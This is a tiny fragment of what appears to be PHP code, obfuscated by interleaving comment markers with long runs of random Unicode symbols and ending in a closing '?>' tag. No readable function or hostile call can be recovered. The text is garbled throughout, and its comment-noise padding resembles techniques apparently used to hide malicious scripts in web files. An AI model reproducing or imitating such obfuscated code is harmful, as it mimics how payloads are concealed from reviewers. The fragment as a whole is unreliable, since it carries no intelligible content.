UPi.⊡〗﹛⊍⊱↗↾✤Ⅳ


-*///
}/*-


×㊬➤≸{—⊝⋤㊓⑷⑺┼⒈▎ℱ♘≍


Acg2R%5×㊬➤≸{—⊝⋤㊓⑷⑺┼⒈▎ℱ♘≍


-*///
vT/*-;O8fjV6S}-*///
::/*-,K)<qGAc_-*///
lIorCTNOae/*-

ㄨ▒』⇈➪¯◒❥♈⊒▤┩↜︼┭≺

I{Toc+^F:6ㄨ▒』⇈➪¯◒❥♈⊒▤┩↜︼┭≺

-*///
();/*-
⌘⇢≮€☀⅙⊑▓⋌☥∜㊖☵┣↱卍✗❂『Ⓞ≸◦Ⓣ︴❹↷
}-0g`~⌘⇢≮€☀⅙⊑▓⋌☥∜㊖☵┣↱卍✗❂『Ⓞ≸◦Ⓣ︴❹↷
-*///
 ?>